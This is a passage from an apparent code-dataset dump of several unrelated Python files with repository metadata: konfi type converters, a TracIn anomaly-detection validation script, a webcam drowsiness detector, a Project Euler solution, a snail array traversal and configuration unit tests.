import source, templ, typeinspect\nfrom .converter import ComplexConverterABC, ConversionError, convert_value, has_converter, register_converter\n\nT = TypeVar(\"T\")\n\n\n# <-- converter groups -------------------------------------------------------->\n\n# primitive types which can be called with multiple input types to get the\n# desired type.\n\ndef _register_primitive_converters(converters: Iterable[type]) -> None:\n for conv in converters:\n register_converter(conv)(conv)\n\n\n_register_primitive_converters((\n bool,\n int, float, complex,\n str, bytes,\n))\n\ndel _register_primitive_converters\n\n\n# types which are first converted to a general type (read: interface)\n# and then converted to the real type.\n\ndef _register_container_converters(converters: Iterable[Tuple[Tuple[type, ...], type]]) -> None:\n def _make_converter(cls: Callable, base_type: type):\n @functools.wraps(cls)\n def converter(val: Any):\n val = convert_value(val, base_type)\n if not isinstance(val, cls):\n val = cls(val)\n\n return val\n\n return converter\n\n for convs, base in converters:\n register_converter(*convs)(_make_converter(\n cast(Callable, convs[-1]),\n base,\n ))\n\n\n_register_container_converters((\n ((Tuple, tuple), Iterable),\n ((List, list), Iterable),\n ((Set, set), Iterable),\n\n ((Dict, dict), Mapping),\n))\n\ndel _register_container_converters\n\n\n# <-- simple converters ------------------------------------------------------->\n\n@register_converter(None, type(None))\ndef none_converter(_: Any) -> None:\n \"\"\"Converts all values to `None`.\"\"\"\n return None\n\n\n@register_converter(Any)\ndef any_convert(val: Any) -> Any:\n \"\"\"Returns value as is.\"\"\"\n return val\n\n\n@register_converter(Iterable, collections.Iterable)\ndef iterable_converter(value: Any) -> Iterable:\n \"\"\"Converts the value to an iterable.\n\n Non-iterable values are wrapped in a tuple.\n\n Even though strings are iterable, this converter does not treat them as such\n to be consistent with the user's expectations.\n\n The same is true for mappings which is converted to an iterable of key,\n value tuples instead of just the keys.\n \"\"\"\n if isinstance(value, Mapping):\n return value.items()\n\n if isinstance(value, Iterable) and not isinstance(value, (str,)):\n return value\n else:\n # yes it looks weird, but this is a tuple\n return value,\n\n\n@register_converter(Mapping, collections.Mapping)\ndef mapping_converter(value: Any) -> Mapping:\n \"\"\"Converts the value to a mapping,\n\n Sequences are interpreted as a mapping from index to value.\n All other value types raise a `ConversionError`.\n \"\"\"\n if isinstance(value, Mapping):\n return value\n elif isinstance(value, Sequence):\n return dict(enumerate(value))\n else:\n raise ConversionError(f\"can't convert {value!r} to a Mapping\")\n\n\n# <-- complex converters ------------------------------------------------------>\n\n@register_converter()\nclass UnionConverter(ComplexConverterABC):\n \"\"\"Converter for union types.\n\n First checks if value is already in the union and if it's not it then\n tries to convert to the values from first to last.\n \"\"\"\n\n def can_convert(self, target: type) -> bool:\n return typeinspect.is_union(target) and all(map(has_converter, typeinspect.get_type_args(target)))\n\n def convert(self, value: Any, target: type) -> Any:\n if typeinspect.has_type(value, target):\n return value\n\n types = typeinspect.get_type_args(target)\n last_exception: Optional[Exception] = None\n\n for typ in types:\n try:\n return 
convert_value(value, typ)\n except ConversionError as e:\n if last_exception is not None:\n last_exception.__cause__ = e\n\n last_exception = e\n\n raise last_exception\n\n\n@register_converter()\nclass TupleConverter(ComplexConverterABC):\n \"\"\"Converter for typed tuples.\n\n The input value is first converted to a collection, if the tuple\n type has a fixed length the input must match that, otherwise any\n length is accepted.\n \"\"\"\n\n def can_convert(self, target: type) -> bool:\n is_tuple = typeinspect.is_tuple(target) \\\n and not typeinspect.has_free_parameters(target)\n\n if not is_tuple:\n return False\n\n container_type = typeinspect.get_origin(target)\n item_types = typeinspect.resolve_tuple(target)[0]\n return has_converter(container_type) and all(map(has_converter, item_types))\n\n def convert(self, value: Any, target: type) -> tuple:\n # convert to a collection\n values = convert_value(value, list)\n\n types, n = typeinspect.resolve_tuple(target)\n if n is None:\n typ = types[0]\n return tuple(convert_value(val, typ) for val in values)\n elif n != len(values):\n raise ConversionError(f\"Can't convert {values!r} to {n}-tuple, lengths don't match\")\n else:\n return tuple(convert_value(val, typ) for val, typ in zip(values, types))\n\n\n@register_converter()\nclass IterableConverter(ComplexConverterABC):\n \"\"\"Converts the value to a typed iterable.\n\n The value is first converted to an untyped `Iterable`.\n All items are converted to the item type and gathered in a `list`.\n The list is then converted to the container type.\n \"\"\"\n\n def can_convert(self, target: type) -> bool:\n is_iterable = typeinspect.is_generic_iterable(target) \\\n and not typeinspect.has_free_parameters(target) \\\n and not typeinspect.is_tuple(target) \\\n and not typeinspect.is_generic_mapping(target)\n\n if not is_iterable:\n return False\n\n container_type = typeinspect.get_origin(target)\n item_type = typeinspect.get_type_args(target)[0]\n return has_converter(container_type) and has_converter(item_type)\n\n def convert(self, value: Any, target: type) -> Iterable[T]:\n container_type = typeinspect.get_origin(target)\n item_type = typeinspect.get_type_args(target)[0]\n\n final_list = []\n\n it = convert_value(value, Iterable)\n for i, sub_value in enumerate(it):\n try:\n v = convert_value(sub_value, item_type)\n except ConversionError as e:\n raise ConversionError(f\"couldn't convert value at index {i} ({sub_value!r}) \"\n f\"to {typeinspect.friendly_name(item_type)}\") from e\n\n final_list.append(v)\n\n if container_type is not None:\n final_list = convert_value(final_list, container_type, exclude_converters={self})\n\n return final_list\n\n\n@register_converter()\nclass MappingConverter(ComplexConverterABC):\n \"\"\"Converts the value to a mapping.\n\n The value is first converted to an untyped `Mapping`.\n A `dict` is which maps the keys converted to the key type to\n the values converted to the value type.\n This dict is then converted to the container type.\n \"\"\"\n\n def can_convert(self, target: type) -> bool:\n is_mapping = typeinspect.is_generic_mapping(target) \\\n and not typeinspect.has_free_parameters(target)\n if not is_mapping:\n return False\n\n container_type = typeinspect.get_origin(target)\n key_type, value_type = typeinspect.get_type_args(target)\n\n return has_converter(container_type) \\\n and has_converter(key_type) \\\n and has_converter(value_type)\n\n def convert(self, value: Any, target: type) -> Iterable[T]:\n container_type = typeinspect.get_origin(target)\n 
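# note: a parametrized Mapping exposes exactly two type arguments, (key_type, value_type)\n        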
key_type, value_type = typeinspect.get_type_args(target)\n\n final_map = {}\n\n mapping = convert_value(value, Mapping)\n for key, value in mapping.items():\n try:\n k = convert_value(key, key_type)\n except ConversionError as e:\n raise ConversionError(f\"couldn't convert key {key!r} to \"\n f\"{typeinspect.friendly_name(key_type)}\") from e\n\n try:\n v = convert_value(value, value_type)\n except ConversionError as e:\n raise ConversionError(f\"couldn't convert value of {key!r} ({value!r}) \"\n f\"to {typeinspect.friendly_name(value_type)}\") from e\n\n final_map[k] = v\n\n if container_type is not None:\n final_map = convert_value(final_map, container_type, exclude_converters={self})\n\n return final_map\n\n\n@register_converter()\nclass TemplateConverter(ComplexConverterABC):\n \"\"\"Converter which converts the value to a template-like object.\n\n This converter exists mainly for templates used in containers like\n `List[MyTemplate]` or `Dict[str, MyTemplate]`.\n\n It also requires that the value is a complete template object. This\n is why it shouldn't be used by a source.\n \"\"\"\n\n def can_convert(self, target: type) -> bool:\n return templ.is_template_like(target)\n\n def convert(self, value: Any, target: type) -> Any:\n value_map = convert_value(value, Mapping)\n\n fields = templ.fields(target)\n obj = templ.create_object_from_template(target)\n source.load_fields_values(obj, fields, value_map)\n templ.ensure_complete(obj, target)\n\n return obj\n\n\n@register_converter()\nclass EnumConverter(ComplexConverterABC):\n \"\"\"Converter for converting values to `enum.Enum`.\n\n The converter prefers a perfect name match, if that fails it tries\n to use a perfect value match.\n If that also fails and the value is a string, the first case-insensitive\n match on either the name or the value of a filed is returned.\n \"\"\"\n\n def can_convert(self, target: type) -> bool:\n return inspect.isclass(target) and issubclass(target, enum.Enum)\n\n def convert(self, value: Any, target: enum.EnumMeta) -> enum.Enum:\n try:\n return target[value]\n except KeyError:\n pass\n\n try:\n return target(value)\n except (ValueError, TypeError):\n pass\n\n if isinstance(value, str):\n value_lower = value.lower()\n for enum_field in target:\n enum_field = cast(enum.Enum, enum_field)\n\n if value_lower == enum_field.name.lower():\n return enum_field\n\n field_val = enum_field.value\n if isinstance(field_val, str) and field_val.lower() == value_lower:\n return enum_field\n\n raise ConversionError(f\"{value!r} isn't in enum {typeinspect.friendly_name(target)}\")\n","repo_name":"gieseladev/konfi","sub_path":"konfi/converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":11043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"29167845734","text":"import argparse, random, os, random, sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport pandas as pd\nimport numpy as np\nimport statsmodels.stats.api as sms\n\nfrom omegaconf import OmegaConf\nfrom sklearn.metrics import confusion_matrix\nfrom tqdm import tqdm\nfrom datetime import datetime\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom model import VAE, customLoss\nimport utils\nimport tracin_utils\nfrom datasets import BaselineDataset\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-config', \n default=None, \n type=str, \n 
help='path to config file')\n\n opts = parser.parse_args()\n\n args = OmegaConf.load(opts.config)\n\n if not torch.cuda.is_available():\n args.device = 'cpu'\n else:\n args.device = 'cuda'\n\n device = torch.device(args.device)\n date_file = datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\n\n Datasets = BaselineDataset(dataset=args.dataset, root_dir=args.data_dir,\n model_name=args.vae.model_name, mode='val')\n dataset = Datasets.get_dataset()\n\n args.model_name = 'n_epoch_{}__btchsz_{}__hsize_{}_{}__ldim_{}__e_layers_{}' + \\\n '__d_layers_{}__opt_{}__lr_{}__wdecay_{}__eps_{}__momentum_{}__' + \\\n 'n_tracin_lyrs_{}__stepszCP_{}__m_{}__l_{}'\n args.model_name = args.model_name.format(args.vae.n_epochs,\n args.vae.batch_size,\n args.vae.hidden_sizes[0],\n args.vae.hidden_sizes[1],\n args.vae.latent_dim, \n args.vae.n_encoder_layers,\n args.vae.n_decoder_layers,\n args.vae.optimizer,\n args.vae.lr,\n args.vae.weight_decay,\n args.vae.eps,\n args.vae.momentum,\n args.vae.tracin_layers,\n args.vae.step_size_CP,\n args.vae.n_random_train_sample,\n args.vae.reconstruct_num)\n\n args.model_dir = os.path.join(args.model_dir, args.dataset, args.model_name)\n\n f1_scores_r_error = []\n precision_r_error = []\n recall_r_error= []\n ap_score_r_error = []\n auc_score_r_error = []\n\n f1_scores_influence = []\n precision_influence = []\n recall_influence = []\n ap_score_influence = []\n auc_score_influence = []\n\n f1_scores_aug_r_error = []\n precision_aug_r_error = []\n recall_aug_r_error = []\n ap_score_aug_r_error = []\n auc_score_aug_r_error = []\n\n for iter in range(args.n_iters):\n\n seed = args.seed + iter\n print('Seed: {}'.format(seed))\n\n # Set seed for reproducibility\n random.seed(seed)\n torch.manual_seed(seed)\n np.random.seed(seed)\n torch.backends.cudnn.deterministic = True\n\n dataloader = DataLoader(dataset, batch_size=args.vae.batch_size, num_workers=0,\n shuffle=True, drop_last=False)\n\n model = VAE(D_in=dataset.num_features(), hidden_sizes=args.vae.hidden_sizes, \n latent_dim=args.vae.latent_dim, n_encoder_layers=args.vae.n_encoder_layers,\n n_decoder_layers=args.vae.n_decoder_layers)\n\n optimizer = utils.get_optimizer(model.parameters(), args.vae.optimizer, args.vae)\n\n epoch = 0\n loss_mse = customLoss(reduction='none')\n self_score = pd.DataFrame({'influence':np.zeros(len(dataset.val_labels)),\n 'labels':dataset.val_labels})\n\n model, _, _ = utils.load_model(model, optimizer, None, args, args.vae.n_epochs, seed, device, verbose=False)\n model = model.to(device)\n \n indexs = []\n scores = []\n \n\n while epoch < args.vae.n_epochs:\n\n epoch += args.vae.step_size_CP\n model, _, _ = utils.load_model(model, optimizer, None, args, epoch, seed, device, verbose=False)\n\n model.to(device)\n print('Computing Influence for CP:{}/{}'.format(epoch, args.vae.n_epochs))\n\n ## selecting n_random_train_sample random normal samples in the training set to evaluate its impact on the val samples\n rand_train_batch = torch.tensor(dataset.train_data[np.random.choice(dataset.train_data.shape[0],\n args.vae.n_random_train_sample,\n replace=False),:])\n\n rand_train_batch = rand_train_batch.to(device)\n \n grad_x_train = tracin_utils.grad_batch(rand_train_batch, args.vae.tracin_layers, \n model, loss_mse, \n args.vae.model_name,\n reconstruct_num=args.vae.reconstruct_num)\n \n grad_x_train = [torch.stack(x) for x in list(zip(*grad_x_train))]\n\n for batchs in tqdm(dataloader):\n\n batch, index, _ = batchs\n batch = batch.to(device)\n\n grad_x_val = tracin_utils.grad_batch(batch, 
args.vae.tracin_layers, \n model, loss_mse, \n args.vae.model_name,\n reconstruct_num=args.vae.reconstruct_num)\n \n grad_x_val = [torch.stack(x) for x in list(zip(*grad_x_val))]\n\n grad_dot = [torch.mean(torch.mm(torch.flatten(val_grad, start_dim=1),\n torch.flatten(train_grad, start_dim=1).transpose(0,1)), dim=1) \n for val_grad, train_grad in zip(grad_x_val, grad_x_train)]\n\n grad_dot_product = torch.mean(torch.stack(grad_dot), dim=0).detach().cpu().numpy()\n\n # add gradient dot product to influences\n self_score.loc[index,\"influence\"] += grad_dot_product * args.vae.lr / args.vae.n_random_train_sample\n\n self_score['influence'] = (self_score['influence']-self_score['influence'].mean())/self_score['influence'].std()\n\n # Influence Score\n (f1_score, precision, recall,\n ap_score, auc_score, thresh) = utils.f_score(self_score['influence'],\n self_score['labels'])\n y_pred = (self_score['influence'] >= thresh).astype(int)\n cm = confusion_matrix(self_score['labels'], y_pred)\n tn, fp, fn, tp = cm.ravel()\n\n print(\"Score:\", \"Influence Score only\"\n \"\\n\\tNumber of frauds in validation set:\",\n dataset.val_labels.sum(),\n \"\\n\\tShare of frauds in validation set:\",\n dataset.val_labels.sum() / len(dataset.val_data),\n \"\\n\\tF1-score: \", f1_score,\n \"\\n\\tPrecision: \", precision,\n \"\\n\\tRecall: \", recall,\n \"\\n\\tAverage Precision: \", ap_score,\n \"\\n\\tAUC Score: \", auc_score,\n \"\\n\\tTrue Negative:\", tn,\n \"\\n\\tFalse Positive:\", fp,\n \"\\n\\tFalse Negative:\", fn,\n \"\\n\\tTrue Positive:\", tp)\n\n f1_scores_influence.append(f1_score)\n precision_influence.append(precision)\n recall_influence.append(recall)\n ap_score_influence.append(ap_score)\n auc_score_influence.append(auc_score)\n\n stats_influence = np.array([f1_scores_influence, precision_influence, recall_influence, ap_score_influence, auc_score_influence]).T\n mean_stats_influence = np.mean(stats_influence, axis=0)\n std_stats_influence = np.std(stats_influence, axis=0)\n conf_ic_influence = np.array( [sms.DescrStatsW(x).tconfint_mean() for x in [f1_scores_influence, \n precision_influence, \n recall_influence, \n ap_score_influence, \n auc_score_influence] ] )\n\n\n np.savetxt(os.path.join(args.save_dir, 'stats_{}.txt'.format(date_file)), [args.model_name], fmt=\"%s\")\n with open(os.path.join(args.save_dir, 'stats_{}.txt'.format(date_file)), 'ab') as file:\n file.write(b'Influence Score')\n file.write(b'\\nF1 Precision Recall AUPRC AUROC\\n')\n np.savetxt(file, stats_influence, delimiter=' ', fmt='%1.3f')\n\n np.savetxt(os.path.join(args.save_dir, 'stats_mean_std_{}.txt'.format(date_file)), [args.model_name], fmt=\"%s\")\n with open(os.path.join(args.save_dir, 'stats_mean_std_{}.txt'.format(date_file)), 'ab') as file:\n file.write(b'Influence Score')\n file.write(b'\\nF1 Precision Recall AUPRC AUROC\\n')\n np.savetxt(file, mean_stats_influence[None], delimiter=' ', fmt='%1.3f')\n file.write(b'\\nstd\\n')\n np.savetxt(file, std_stats_influence[None], delimiter=' ', fmt='%1.3f')\n file.write(b'\\nIC\\n')\n np.savetxt(file, conf_ic_influence, delimiter=' ', fmt='%1.3f')\n\n","repo_name":"TracInAD/TracInAD","sub_path":"VAE/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":9761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7494978416","text":"from threading import Thread\r\nimport time\r\nimport numpy as np\r\nimport functions\r\nfrom imutils.video import VideoStream\r\nfrom imutils import 
face_utils\r\nimport imutils\r\nimport dlib\r\nimport cv2\r\nimport argparse\r\n\r\n\r\nap = argparse.ArgumentParser()\r\nap.add_argument(\"-p\", \"--shape-predictor\", required=True,\r\n\thelp=\"Enter the path to the shape predictor.\")\r\nap.add_argument(\"-a\", \"--alarm\", type=str, default=\"\",\r\n\thelp=\"Enter the path to the alarm file.\")\r\nap.add_argument(\"-w\", \"--webcam\", type=int, default=0,\r\n\thelp=\"Webcam (can change it to an external webcam)\")\r\nargs = vars(ap.parse_args())\r\n\r\n'''\r\ndef visualize_facial_landmarks(image, shape, colors=None, alpha=0.75):\r\n\toverlay = image.copy()\r\n\toutput = image.copy()\r\n\tif colors is None:\r\n\t\tcolors = [(19, 199, 109), (79, 76, 240), (230, 159, 23),\r\n\t\t\t(168, 100, 168), (158, 163, 32),\r\n\t\t\t(163, 38, 32), (180, 42, 220)]\r\n\tfor (i, name) in enumerate(face_utils.FACIAL_LANDMARKS_IDXS.keys()):\r\n\t\t(j, k) = face_utils.FACIAL_LANDMARKS_IDXS[name]\r\n\t\tpts = shape[j:k]\r\n\t\tif name == \"jaw\":\r\n\t\t\tfor l in range(1, len(pts)):\r\n\t\t\t\tptA = tuple(pts[l - 1])\r\n\t\t\t\tptB = tuple(pts[l])\r\n\t\t\t\tcv2.line(overlay, ptA, ptB, colors[i], 2)\r\n\t\telse:\r\n\t\t\thull = cv2.convexHull(pts)\r\n\t\t\tcv2.drawContours(overlay, [hull], -1, colors[i], -1)\r\n\t\t\t# apply the transparent overlay\r\n\tcv2.addWeighted(overlay, alpha, output, 1 - alpha, 0, output)\r\n\t# return the output image\r\n\treturn output\r\n'''\r\n\r\nthreshold = 0.3\r\nthreshold_frames = 45\r\n\r\n\r\ncount = 0\r\nAl_on = False\r\n\r\n\r\nprint(\"Finding facial predictor!\")\r\ndetector = dlib.get_frontal_face_detector()\r\npredictor = dlib.shape_predictor(args[\"shape_predictor\"])\r\n\r\n\r\n(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\r\n(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"]\r\n(aStart, bEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"nose\"]\r\n(bStart, aEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"jaw\"]\r\n(xStart, yEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"mouth\"]\r\n\r\nprint(\"Starting Video Stream!\")\r\nvs = VideoStream(src=args[\"webcam\"]).start()\r\ntime.sleep(1.0)\r\n\r\n\r\nwhile True:\r\n\r\n\tframe = vs.read()\r\n\tframe = imutils.resize(frame, width=450)\r\n\tgray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\tsize = frame.shape\r\n\trects = detector(gray, 0)\r\n\r\n\tfor rect in rects:\r\n\r\n\t\tshape = predictor(gray, rect)\r\n\t\tshape = face_utils.shape_to_np(shape)\r\n\t\tnose = shape[aStart:bEnd]\r\n\t\tjaw = shape[bStart:aEnd]\r\n\t\tmouth = shape[xStart:yEnd]\r\n\t\tjawHull = cv2.convexHull(jaw)\r\n\t\tmouthHull = cv2.convexHull(mouth)\r\n\t\tnoseHull = cv2.convexHull(nose)\r\n\t\tleftEye = shape[lStart:lEnd]\r\n\t\trightEye = shape[rStart:rEnd]\r\n\t\tleftEAR = functions.eye_aspect_ratio(leftEye)\r\n\t\trightEAR = functions.eye_aspect_ratio(rightEye)\r\n\r\n\r\n\t\tear = (leftEAR + rightEAR) / 2.0\r\n\r\n\r\n\t\tleftEyeHull = cv2.convexHull(leftEye)\r\n\t\trightEyeHull = cv2.convexHull(rightEye)\r\n\t\tcv2.drawContours(frame, [mouthHull], -1, (0, 255, 0), 1)\r\n\t\tcv2.drawContours(frame, [noseHull], -1, (0, 255, 0), 1)\r\n\t\tcv2.drawContours(frame, [jawHull], -1, (0, 255, 0), 1)\r\n\t\tcv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)\r\n\t\tcv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)\r\n\r\n\t\t#visualize_facial_landmarks(frame, face_utils.FACIAL_LANDMARKS_IDXS)\r\n\r\n\t\tif ear < threshold:\r\n\t\t\tcount += 1\r\n\r\n\r\n\t\t\tif count >= threshold_frames:\r\n\r\n\t\t\t\tif not Al_on:\r\n\t\t\t\t\tAl_on = True\r\n\r\n\r\n\t\t\t\t\tif 
args[\"alarm\"] != \"\":\r\n\t\t\t\t\t\tt = Thread(target=functions.sound_alarm,\r\n\t\t\t\t\t\t\targs=(args[\"alarm\"],))\r\n\t\t\t\t\t\tt.deamon = True\r\n\t\t\t\t\t\tt.start()\r\n\r\n\r\n\t\t\t\tcv2.putText(frame, \"WAKE UP!\", (10, 30),\r\n\t\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n\r\n\r\n\t\telse:\r\n\t\t\tcount = 0\r\n\t\t\tAl_on = False\r\n\r\n\r\n\t\tcv2.putText(frame, \"EAR: {:.2f}\".format(ear), (300, 30),\r\n\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n\r\n\r\n\tcv2.imshow(\"Frame\", frame)\r\n\tkey = cv2.waitKey(1) & 0xFF\r\n\r\n\r\n\tif key == ord(\"e\"):\r\n\t\tbreak\r\n\r\ncv2.destroyAllWindows()\r\nvs.stop()","repo_name":"arjunmann73/Drowsiness-Detection-using-Facial-Recognition","sub_path":"drowsy.py","file_name":"drowsy.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25330759890","text":"from __future__ import division\n\nfrom MathPackage.NumberOperations import num2Dig\nfrom Timer import timer\n\ndef is_bouncy(n):\n has_inc, has_dec = False,False\n rightNum = n % 10\n n = n // 10\n while n > 0:\n leftNum = n % 10\n if leftNum > rightNum: has_inc = True\n elif leftNum < rightNum: has_dec = True\n n = n // 10\n rightNum = leftNum\n if has_dec and has_inc: return True\n return False\n\n\ndef bouncy(n):\n digs = num2Dig(n)\n current = 0\n if len(set(digs)) == 1: return True\n sDigs = sorted(digs)\n if sDigs == digs: return False\n sDigs.reverse()\n if sDigs == digs: return False\n return True\n\n@timer\ndef main():\n count = 0\n current = 99\n while count < .99 * current:\n current += 1\n if is_bouncy(current): count += 1\n print(str(current) + \": \" + str(count / current))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"milespossing/projectEuler","sub_path":"Python/Completed/p112.py","file_name":"p112.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8630790569","text":"\"\"\"\nToy method to return an array of nested lists printed out in a snake-like format. 
Useful list methods included.\n\"\"\"\n\n\ndef snail(array):\n \"\"\"\n Function to return a nested array in snake format, circling from the outside to the inside as 1-dimensional array.\n Args:\n array: nxn array of nested lists (rows, columns)\n\n Returns:\n n**2 long array including the snake formatted original array.\n \"\"\"\n a = []\n # while there are still elements in the array\n while array:\n # get the entire first row\n a.extend(list(array.pop(0)))\n # match the nested list with its counterparts, meaning [[1,2], becomes [[1,3],\n # [3,4]] [2,4]]\n array = list(zip(*array))\n # reverse the list to [[2,4],\n # [1,3]]\n array.reverse()\n return a\n","repo_name":"marcluettecke/programming_challenges","sub_path":"python_scripts/snakeprint.py","file_name":"snakeprint.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72988864107","text":"import os, sys, pdb, shutil, logging, json, re, importlib\nimport unittest as test\nfrom nistoar.testing import *\n\nfrom nistoar.pdr import config\nfrom nistoar.pdr.exceptions import ConfigurationException\n\ndatadir = os.path.join(os.path.dirname(__file__), \"data\")\ntmpd = None\n\ndef setUpModule():\n global tmpd\n ensure_tmpdir()\n tmpd = tmpdir()\n\ndef tearDownModule():\n rmtmpdir()\n\nclass TestConfig(test.TestCase):\n\n def test_load_from_service(self):\n with self.assertRaises(NotImplementedError):\n config.load_from_service(\"goob/dev\")\n\n def test_lookup_config_server(self):\n with self.assertRaises(NotImplementedError):\n config.lookup_config_server(8888)\n\n def test_load_from_file(self):\n cfgfile = os.path.join(datadir, \"config.json\")\n cfg = config.load_from_file(cfgfile)\n\n self.assertIsInstance(cfg, dict)\n self.assertEqual(cfg['working_dir'], \"/pdr/work\")\n\n cfgfile = os.path.join(datadir, \"config.yaml\")\n cfg = config.load_from_file(cfgfile)\n\n self.assertIsInstance(cfg, dict)\n self.assertEqual(cfg['working_dir'], \"/pdr/work\")\n\n def test_resolve_configuration(self):\n cfgfile = os.path.join(datadir, \"config.json\")\n cfg = config.resolve_configuration(cfgfile)\n self.assertEqual(cfg['working_dir'], \"/pdr/work\")\n\n cfgfile = \"file://\" + cfgfile\n cfg = config.resolve_configuration(cfgfile)\n self.assertEqual(cfg['working_dir'], \"/pdr/work\")\n\n cfgfile = \"http://goober.net/gurn.log\"\n with self.assertRaises(NotImplementedError):\n cfg = config.resolve_configuration(cfgfile)\n\n def test_merge_config(self):\n app = {\n \"foo\": \"bar\",\n \"goob\": { \"gurn\": \"cranston\", \"hank\": \"aaron\" },\n \"zub\": \"dub\",\n \"tell\": { \"a\": 1 }\n }\n defc = {\n \"black\": \"blue\",\n \"goob\": { \"gurn\": \"gomer\", \"patty\": \"duke\" },\n \"tell\": 1,\n \"zub\": { \"dub\": 2}\n }\n out = config.merge_config(app, defc)\n self.assertEqual(out['foo'], 'bar')\n self.assertEqual(out['goob'], { 'gurn': 'cranston', \"hank\": \"aaron\",\n 'patty': \"duke\" })\n self.assertEqual(out['zub'], 'dub')\n self.assertEqual(out['tell'], {\"a\": 1})\n\nclass TestLogConfig(test.TestCase):\n\n def resetLogfile(self):\n if config._log_handler:\n self.rootlog.removeHandler(config._log_handler)\n if self.logfile and os.path.exists(self.logfile):\n os.remove(self.logfile)\n self.logfile = None\n\n def setUp(self):\n if not hasattr(self, 'logfile'):\n self.logfile = None\n if not hasattr(self, 'rootlog'):\n self.rootlog = logging.getLogger()\n self.resetLogfile()\n\n def tearDown(self):\n self.resetLogfile()\n\n def 
test_from_config(self):\n logfile = \"cfgd.log\"\n cfg = {\n 'logdir': tmpd,\n 'logfile': logfile,\n 'loglevel': 'DEBUG'\n }\n\n self.logfile = os.path.join(tmpd, logfile)\n self.assertFalse(os.path.exists(self.logfile))\n\n config.configure_log(config=cfg)\n self.assertEqual(config.global_logdir, tmpd)\n self.assertEqual(config.global_logfile, self.logfile)\n\n self.rootlog.warning('Oops')\n self.assertTrue(os.path.exists(self.logfile))\n with open(self.logfile) as fd:\n words = fd.read()\n self.assertIn(\"Oops\", words)\n \n def test_abs(self):\n self.logfile = os.path.join(tmpd, \"cfgfile.log\")\n cfg = {\n 'logfile': \"goob.log\"\n }\n\n self.assertFalse(os.path.exists(self.logfile))\n config.configure_log(logfile=self.logfile, config=cfg)\n self.rootlog.warning('Oops')\n self.assertTrue(os.path.exists(self.logfile))\n \nclass TestConfigService(test.TestCase):\n \n def test_ctor(self):\n srvc = config.ConfigService(\"https://config.org/oar/\", \"dev\")\n self.assertEqual(srvc._base, \"https://config.org/oar/\")\n self.assertEqual(srvc._prof, \"dev\")\n\n srvc = config.ConfigService(\"https://config.org/oar\")\n self.assertEqual(srvc._base, \"https://config.org/oar/\")\n self.assertIsNone(srvc._prof)\n\n srvc = config.ConfigService(\"https://config.org\")\n self.assertEqual(srvc._base, \"https://config.org/\")\n self.assertIsNone(srvc._prof)\n\n def test_bad_url(self):\n with self.assertRaises(ConfigurationException):\n srvc = config.ConfigService(\"config.org\")\n\n with self.assertRaises(ConfigurationException):\n srvc = config.ConfigService(\"https://\")\n\n def test_url_for(self):\n srvc = config.ConfigService(\"https://config.org/oar/\", \"dev\")\n self.assertEqual(srvc.url_for(\"goob\"), \"https://config.org/oar/goob/dev\")\n self.assertEqual(srvc.url_for(\"goob\", \"dumb\"),\n \"https://config.org/oar/goob/dumb\")\n\n def test_from_env(self):\n try:\n if 'OAR_CONFIG_SERVICE' in os.environ:\n del os.environ['OAR_CONFIG_SERVICE']\n self.assertIsNone(config.ConfigService.from_env())\n \n os.environ['OAR_CONFIG_SERVICE'] = \"https://config.org/oar/\"\n srvc = config.ConfigService.from_env()\n self.assertEqual(srvc._base, \"https://config.org/oar/\")\n self.assertIsNone(srvc._prof)\n \n os.environ['OAR_CONFIG_ENV'] = \"test\"\n srvc = config.ConfigService.from_env()\n self.assertEqual(srvc._base, \"https://config.org/oar/\")\n self.assertEqual(srvc._prof, \"test\")\n finally:\n if 'OAR_CONFIG_SERVICE' in os.environ:\n del os.environ['OAR_CONFIG_SERVICE']\n if 'OAR_CONFIG_ENV' in os.environ:\n del os.environ['OAR_CONFIG_ENV']\n\n def test_cvtarrays(self):\n d = {\n \"a\": {\n \"[1]\": \"ia\",\n \"[5]\": {\n \"ib\": {\n \"[0]\": \"ibb\",\n \"[3]\": \"ibe\"\n },\n \"[0]\": \"0a\",\n },\n \"[0]\": \"ic\",\n \"[3]\": \"id\"\n }\n }\n out = {\n \"a\": [ \"ic\", \"ia\", \"id\", {\n \"ib\": [ \"ibb\", \"ibe\" ],\n \"[0]\": \"0a\"\n }]\n }\n self.assertEqual(config.ConfigService._cvtarrays(d), out)\n\n def test_inflate(self):\n d = {\n \"working_dir\": \"/data/pdr\",\n \"store_dir\": \"/data/store\",\n 'notifier.alerts[1].type': \"preserve.success\",\n 'notifier.alerts[1].targets[0]': \"dev\",\n 'notifier.alerts[0].type': \"preserve.failure\",\n 'notifier.alerts[0].targets[0]': \"oarop\",\n 'sip_type.midas.common.review_dir': \"/data/review\",\n 'sip_type.midas.common.upload_dir': \"/data/upload\",\n }\n out = {\n \"working_dir\": \"/data/pdr\",\n 